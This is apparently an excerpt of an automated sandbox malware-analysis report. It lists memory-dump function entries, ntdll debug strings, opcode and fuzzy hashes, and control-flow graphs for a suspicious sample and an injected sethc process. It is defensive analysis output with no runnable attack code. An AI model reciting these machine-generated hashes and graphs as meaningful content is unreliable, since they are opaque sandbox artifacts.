                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: acf26450c10d35698d044a95538322efa4bba660a99c99841b4ea722f1c29baa
                                                          • Instruction ID: ea2f19f2ab2415677bd8c05ef6b4fb143fe46a4dda98177daad21b225ae53960
                                                          • Opcode Fuzzy Hash: acf26450c10d35698d044a95538322efa4bba660a99c99841b4ea722f1c29baa
                                                          • Instruction Fuzzy Hash: 44514971A00318AAEF21EB95DD9AFAD7BA9EF08304F4004F9D504AB191DB709E45CF61

                                                          Control-flow Graph
                                                          Strings
                                                          • SsHd, xrefs: 3602A304
                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 360777DD, 36077802
                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 360778F3
                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 360777E2
                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36077807
                                                          • Actx , xrefs: 36077819, 36077880
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                          • API String ID: 0-1988757188
                                                          • Opcode ID: 75f6e0b54162e88b53b5d827c710c9d9810774eaa30cde4d2b73e9bc9135c6b9
                                                          • Instruction ID: fb6d2154a678682835c3632089cb2eb156ff88969df6b0aaed8ffe3630218da0
                                                          • Opcode Fuzzy Hash: 75f6e0b54162e88b53b5d827c710c9d9810774eaa30cde4d2b73e9bc9135c6b9
                                                          • Instruction Fuzzy Hash: 82E1B274A043128FE704CE25C89671B7BE1BF843A4F500AADF855EB290DFB1D889CB91

                                                          Control-flow Graph
                                                          APIs
                                                          Strings
                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3607914E, 36079173
                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36079153
                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36079178
                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36079372
                                                          • Actx , xrefs: 36079315
                                                          • GsHd, xrefs: 3602D794
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                          • API String ID: 3446177414-2196497285
                                                          • Opcode ID: 8d01ed1bf1e5c5c1a38f30e267c16d929dd6df20e659c52f8f018499686c4652
                                                          • Instruction ID: 9a1c9c2356e7efdf1a774a089950c43adf29a8af402147bbcb169558fd19cb0b
                                                          • Opcode Fuzzy Hash: 8d01ed1bf1e5c5c1a38f30e267c16d929dd6df20e659c52f8f018499686c4652
                                                          • Instruction Fuzzy Hash: 7AE1A374A043428FE700CF15C882B5ABFF5BF88358F504AADE9A58B291D771DC85CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                          • API String ID: 3446177414-4227709934
                                                          • Opcode ID: 891e5265cf097835ef937e87d37672c4f691b754c4bb6df1965f27c4d457ae2b
                                                          • Instruction ID: b2baf5d9a2848d81a340ac2fd0042b2ec00f7452c1f86f87471e6f97124b6479
                                                          • Opcode Fuzzy Hash: 891e5265cf097835ef937e87d37672c4f691b754c4bb6df1965f27c4d457ae2b
                                                          • Instruction Fuzzy Hash: B0415BB9E00209ABDB01DFA9C992ADEBFF5FF48394F1000A9E904B7350D7719A51CB90
                                                          APIs
                                                          Strings
                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36069885
                                                          • LdrpLoadShimEngine, xrefs: 3606984A, 3606988B
                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36069843
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 36069854, 36069895
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-3589223738
                                                          • Opcode ID: ce103c76942d319ad50d0ef16b129685892ffb6a71765869b2c7fe0b78b94efd
                                                          • Instruction ID: 2a89bbe70091c936f03d0314ee2bc6d2f2e486e795fc67a121fc6c342887ec82
                                                          • Opcode Fuzzy Hash: ce103c76942d319ad50d0ef16b129685892ffb6a71765869b2c7fe0b78b94efd
                                                          • Instruction Fuzzy Hash: D5513475A203549FEF04DBA9CC56A9D7FF3BB40304F0401AAE640BB2A6CB709C65CB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                          • API String ID: 3446177414-3224558752
                                                          • Opcode ID: 3a630b3f3c9bf2a664021e7d737d32d33f7eb8bd31fecf21041e77391cf8441f
                                                          • Instruction ID: 8e82600c47973c03a46a52181407b1247fb26a48afe8add76fccdb3cad04fcfd
                                                          • Opcode Fuzzy Hash: 3a630b3f3c9bf2a664021e7d737d32d33f7eb8bd31fecf21041e77391cf8441f
                                                          • Instruction Fuzzy Hash: 73416834A01B45DFE701CF28CA46B4DBFF4EF40325F2089E8E52587281CB38A984DB96
                                                          APIs
                                                          Strings
                                                          • ---------------------------------------, xrefs: 360BEDF9
                                                          • HEAP: , xrefs: 360BECDD
                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 360BEDE3
                                                          • Entry Heap Size , xrefs: 360BEDED
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                          • API String ID: 3446177414-1102453626
                                                          • Opcode ID: 19da0dc182e9ee151420815afbc100659120b730aa4309500981dcc7dd2b9dd5
                                                          • Instruction ID: 19c43a1c737e3f0f8864f7760b395243232150c6f6ecbb9a7b9aec7196ccc85b
                                                          • Opcode Fuzzy Hash: 19da0dc182e9ee151420815afbc100659120b730aa4309500981dcc7dd2b9dd5
                                                          • Instruction Fuzzy Hash: BC418A39A10211DFDF18DF19C88190ABFF6EF89394B25C4AAD508AB220D771EC56DF90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                          • API String ID: 3446177414-1222099010
                                                          • Opcode ID: c4c97380d33d818b5e43cc23ab34d8cf1f4479c041339391c02fee79f707f1b5
                                                          • Instruction ID: 1a9cd9cf72bb1cb52580933f5ee807b66e095fa2403de6a2dbd7b0065f431623
                                                          • Opcode Fuzzy Hash: c4c97380d33d818b5e43cc23ab34d8cf1f4479c041339391c02fee79f707f1b5
                                                          • Instruction Fuzzy Hash: F9313135512784EFF712CB28C90AB4E7FE8EF01768F1088C4E5214B691CB69AA84CB52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$@
                                                          • API String ID: 3446177414-1194432280
                                                          • Opcode ID: b7df868388d7995236fc32e99d1473004f2126f66ca6520dccd9df0d9c8650f6
                                                          • Instruction ID: b1c966ff5bd0242b4e5c2b4007f05bd30e8cfcded4673433dd04cc5d93e6d243
                                                          • Opcode Fuzzy Hash: b7df868388d7995236fc32e99d1473004f2126f66ca6520dccd9df0d9c8650f6
                                                          • Instruction Fuzzy Hash: 78813AB5D002699FDB21CB55CD42BDEBBB8AF08750F0041EAEA19B7240D7709E85CFA5
                                                          APIs
                                                          Strings
                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36083439
                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 36083466
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 3608344A, 36083476
                                                          • LdrpFindDllActivationContext, xrefs: 36083440, 3608346C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 3446177414-3779518884
                                                          • Opcode ID: 79560960faeb111b10ac6bd4295738d4ba36d5263e34956b681737369a3a7fed
                                                          • Instruction ID: 2e1db8202f2dda51fa7333241fa3b68c0063cd86901f4fd987de66116f0661b4
                                                          • Opcode Fuzzy Hash: 79560960faeb111b10ac6bd4295738d4ba36d5263e34956b681737369a3a7fed
                                                          • Instruction Fuzzy Hash: 933125B6E00356ABFB73FB05C847A19AEE4EB40394F4A88F6D50467150D7619C88CFE1
                                                          APIs
                                                          Strings
                                                          • Failed to allocated memory for shimmed module list, xrefs: 36079F1C
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 36079F2E
                                                          • LdrpCheckModule, xrefs: 36079F24
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-161242083
                                                          • Opcode ID: 6cf75085e6a9244c945809f288a5617e1bd2cf455026ed1669596e03ccbdf547
                                                          • Instruction ID: 57b4d64c9f7757734a1ca77596df9ab0a91fa3bcb37402249596189129812a02
                                                          • Opcode Fuzzy Hash: 6cf75085e6a9244c945809f288a5617e1bd2cf455026ed1669596e03ccbdf547
                                                          • Instruction Fuzzy Hash: 5071E474E112059FEB04DF68CE82AAEBBF5FF44308F2444A9E542EB251E7309D52CB95
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ac951d424330495919604508665f37bb41f8ec0e8eeecea4e658e80fb2574c7
                                                          • Instruction ID: 52ab54a956d2b765b2c909513c4bf923614eca0fe523bf4fd16bbe9b29eb32f1
                                                          • Opcode Fuzzy Hash: 5ac951d424330495919604508665f37bb41f8ec0e8eeecea4e658e80fb2574c7
                                                          • Instruction Fuzzy Hash: 38E1FFB4D01718CFEB24CFAAD981A8DBBF1FF48315F2045AAE555A7220DB70A881CF54
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: bb4264cfbb486106921eacdb9fce4772918d314c919dacfbccf2a5c4b6e9002b
                                                          • Instruction ID: 853e9f249f3300875ad184c34b8a61162c9dd4f69de9509c7368bd0e8d8bf910
                                                          • Opcode Fuzzy Hash: bb4264cfbb486106921eacdb9fce4772918d314c919dacfbccf2a5c4b6e9002b
                                                          • Instruction Fuzzy Hash: 4C516F75B10A329FEB08CE59C8A2A19BBE1FB8D354B2041EDD506E7710DBB5EC51CB80
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                          • String ID:
                                                          • API String ID: 4281723722-0
                                                          • Opcode ID: f6b9ee07f6819fac97cec4d90227b0e7fc569142079e5a65b84ad967abe90c41
                                                          • Instruction ID: 833949c53c97df13e6ee8305caf09f738fb06f0601a31487a4e430b226697d56
                                                          • Opcode Fuzzy Hash: f6b9ee07f6819fac97cec4d90227b0e7fc569142079e5a65b84ad967abe90c41
                                                          • Instruction Fuzzy Hash: 94313475E00228DFDF05DFA8D986A9EBBF1FB48320F1041AAE611B7290CB755901CFA4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: 0$0
                                                          • API String ID: 3446177414-203156872
                                                          • Opcode ID: 2822bae7e51a4f3c2afc8a66cc13909194fc2c61b93fc9b50fa741b7a01eaaf7
                                                          • Instruction ID: 7a074279fe1819f3b0c2e89a35a18b6d2600aee6bfb4de5f94071ba917e75dcb
                                                          • Opcode Fuzzy Hash: 2822bae7e51a4f3c2afc8a66cc13909194fc2c61b93fc9b50fa741b7a01eaaf7
                                                          • Instruction Fuzzy Hash: 8D418EB1A087019FE300CF29C845A5ABBE9BB88358F0085AEF588DB340D771E945CF96

                                                          Execution Graph

                                                          Execution Coverage: 0.5%
                                                          Dynamic/Decrypted Code Coverage: 71.4%
                                                          Signature Coverage: 0%
                                                          Total number of Nodes: 14
                                                          Total number of Limit Nodes: 2
                                                          execution_graph 69876 45029f0 LdrInitializeThunk 69877 43df033 69878 43df04d 69877->69878 69879 43df1c7 NtQueryInformationProcess 69878->69879 69880 43df201 69878->69880 69879->69880 69887 4502b20 69889 4502b2a 69887->69889 69890 4502b31 69889->69890 69891 4502b3f LdrInitializeThunk 69889->69891 69892 1b87cc 69895 1b8781 69892->69895 69893 1b87d7 69894 1b87a6 69895->69892 69895->69894 69897 4502e50 LdrInitializeThunk 69895->69897 69897->69893

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 43df01d-43df01f 1 43df035-43df04b 0->1 2 43df021-43df030 0->2 3 43df04d-43df064 call 43e1318 1->3 4 43df069-43df089 call 43e1338 call 43dd028 1->4 2->1 3->4 10 43df08f-43df198 call 43def58 call 43e1338 call 43e52a4 call 43d0398 call 43e08e8 call 43d0398 call 43e08e8 call 43e3008 4->10 11 43df686-43df691 4->11 28 43df19e-43df238 call 43d0398 call 43e08e8 NtQueryInformationProcess call 43e1338 call 43d0398 call 43e08e8 10->28 29 43df67a-43df681 call 43def58 10->29 41 43df24c-43df2c8 call 43e52b2 call 43d0398 call 43e08e8 28->41 42 43df23a-43df247 28->42 29->11 41->42 51 43df2ce-43df2dd call 43e52dc 41->51 42->29 54 43df2df-43df325 call 43e2028 51->54 55 43df32a-43df370 call 43d0398 call 43e08e8 call 43e3968 51->55 54->29 65 43df38f-43df48b call 43d0398 call 43e08e8 call 43e52ea call 43d0398 call 43e08e8 call 43e3328 call 43e12e8 * 3 call 43e52dc 55->65 66 43df372-43df38a 55->66 89 43df48d-43df4bc call 43e52dc call 43e12e8 call 43e533e call 43e52f8 65->89 90 43df4be-43df4d6 call 43e52dc 65->90 66->29 101 43df519-43df523 89->101 96 43df4d8-43df4fd call 43e2ad8 90->96 97 43df502-43df514 call 43e1f68 90->97 96->97 97->101 103 43df529-43df579 call 43d0398 call 43e08e8 call 43e3648 call 43e52dc 101->103 104 43df5f1-43df65a call 43d0398 call 43e08e8 call 43e3c88 101->104 123 43df5ae-43df5b5 103->123 124 43df57b-43df5a4 call 43e5388 call 43e533e 103->124 104->29 129 43df65c-43df671 104->129 126 43df5b7-43df5bf call 43e52dc 123->126 127 43df5c1-43df5cc 123->127 124->123 126->104 126->127 127->104 131 43df5ce-43df5ec call 43e3fa8 127->131 129->29 133 43df675 call 43e1318 129->133 131->104 133->29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414385536.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_43d0000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: ce0e5c2a2c5e8f8b29aa1abfd81c8560697a5b17aaacde96a3c0e004d51ec75c
                                                          • Instruction ID: 2b5820d4a65ca5ec6e6af4c41d92d5489e8b73ae587110f0bbb71a22fcd2a8fe
                                                          • Opcode Fuzzy Hash: ce0e5c2a2c5e8f8b29aa1abfd81c8560697a5b17aaacde96a3c0e004d51ec75c
                                                          • Instruction Fuzzy Hash: 9D122A75518A8C9FDBA9EF68D8946EE77E1FF99308F00162AD84AC7240DF34A641CB41

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 138 43df028-43df04b 140 43df04d-43df064 call 43e1318 138->140 141 43df069-43df089 call 43e1338 call 43dd028 138->141 140->141 147 43df08f-43df198 call 43def58 call 43e1338 call 43e52a4 call 43d0398 call 43e08e8 call 43d0398 call 43e08e8 call 43e3008 141->147 148 43df686-43df691 141->148 165 43df19e-43df238 call 43d0398 call 43e08e8 NtQueryInformationProcess call 43e1338 call 43d0398 call 43e08e8 147->165 166 43df67a-43df681 call 43def58 147->166 178 43df24c-43df2c8 call 43e52b2 call 43d0398 call 43e08e8 165->178 179 43df23a-43df247 165->179 166->148 178->179 188 43df2ce-43df2dd call 43e52dc 178->188 179->166 191 43df2df-43df325 call 43e2028 188->191 192 43df32a-43df370 call 43d0398 call 43e08e8 call 43e3968 188->192 191->166 202 43df38f-43df48b call 43d0398 call 43e08e8 call 43e52ea call 43d0398 call 43e08e8 call 43e3328 call 43e12e8 * 3 call 43e52dc 192->202 203 43df372-43df38a 192->203 226 43df48d-43df4bc call 43e52dc call 43e12e8 call 43e533e call 43e52f8 202->226 227 43df4be-43df4d6 call 43e52dc 202->227 203->166 238 43df519-43df523 226->238 233 43df4d8-43df4fd call 43e2ad8 227->233 234 43df502-43df514 call 43e1f68 227->234 233->234 234->238 240 43df529-43df579 call 43d0398 call 43e08e8 call 43e3648 call 43e52dc 238->240 241 43df5f1-43df65a call 43d0398 call 43e08e8 call 43e3c88 238->241 260 43df5ae-43df5b5 240->260 261 43df57b-43df5a4 call 43e5388 call 43e533e 240->261 241->166 266 43df65c-43df671 241->266 263 43df5b7-43df5bf call 43e52dc 260->263 264 43df5c1-43df5cc 260->264 261->260 263->241 263->264 264->241 268 43df5ce-43df5ec call 43e3fa8 264->268 266->166 270 43df675 call 43e1318 266->270 268->241 270->166
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 043DF1E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414385536.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_43d0000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 0
                                                          • API String ID: 1778838933-4108050209
                                                          • Opcode ID: 3a32441ab733e54e8015dc9e3498067a6e3816a6b313f4c8ffa3101e8eb2932b
                                                          • Instruction ID: 0cf9f949a92a0fdfea4293d661cd7d4acd367084dc5c253e6b755f9000632e29
                                                          • Opcode Fuzzy Hash: 3a32441ab733e54e8015dc9e3498067a6e3816a6b313f4c8ffa3101e8eb2932b
                                                          • Instruction Fuzzy Hash: BA613071914A8C9FEBA9EF68D8946EE7BF1FF98304F40162E944EC7250DF3491458B41

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 275 43df033-43df04b 276 43df04d-43df064 call 43e1318 275->276 277 43df069-43df089 call 43e1338 call 43dd028 275->277 276->277 283 43df08f-43df198 call 43def58 call 43e1338 call 43e52a4 call 43d0398 call 43e08e8 call 43d0398 call 43e08e8 call 43e3008 277->283 284 43df686-43df691 277->284 301 43df19e-43df1fc call 43d0398 call 43e08e8 NtQueryInformationProcess call 43e1338 283->301 302 43df67a-43df681 call 43def58 283->302 309 43df201-43df238 call 43d0398 call 43e08e8 301->309 302->284 314 43df24c-43df2c8 call 43e52b2 call 43d0398 call 43e08e8 309->314 315 43df23a-43df247 309->315 314->315 324 43df2ce-43df2dd call 43e52dc 314->324 315->302 327 43df2df-43df325 call 43e2028 324->327 328 43df32a-43df370 call 43d0398 call 43e08e8 call 43e3968 324->328 327->302 338 43df38f-43df48b call 43d0398 call 43e08e8 call 43e52ea call 43d0398 call 43e08e8 call 43e3328 call 43e12e8 * 3 call 43e52dc 328->338 339 43df372-43df38a 328->339 362 43df48d-43df4bc call 43e52dc call 43e12e8 call 43e533e call 43e52f8 338->362 363 43df4be-43df4d6 call 43e52dc 338->363 339->302 374 43df519-43df523 362->374 369 43df4d8-43df4fd call 43e2ad8 363->369 370 43df502-43df514 call 43e1f68 363->370 369->370 370->374 376 43df529-43df579 call 43d0398 call 43e08e8 call 43e3648 call 43e52dc 374->376 377 43df5f1-43df65a call 43d0398 call 43e08e8 call 43e3c88 374->377 396 43df5ae-43df5b5 376->396 397 43df57b-43df5a4 call 43e5388 call 43e533e 376->397 377->302 402 43df65c-43df671 377->402 399 43df5b7-43df5bf call 43e52dc 396->399 400 43df5c1-43df5cc 396->400 397->396 399->377 399->400 400->377 404 43df5ce-43df5ec call 43e3fa8 400->404 402->302 406 43df675 call 43e1318 402->406 404->377 406->302
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 043DF1E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414385536.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_43d0000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 0
                                                          • API String ID: 1778838933-4108050209
                                                          • Opcode ID: b86f8229cc9629ab622a4de30dadbdc85ef068a1449fff79306d33f8f75beada
                                                          • Instruction ID: 5dda1bb80a782b0b13f307351d2ca0311998ea204b05eb655c5493af88b24031
                                                          • Opcode Fuzzy Hash: b86f8229cc9629ab622a4de30dadbdc85ef068a1449fff79306d33f8f75beada
                                                          • Instruction Fuzzy Hash: 2B512E71914A8C9FEBA9EF68D8946EE7BF1FF98308F40162E944EC7250DF3492458B41
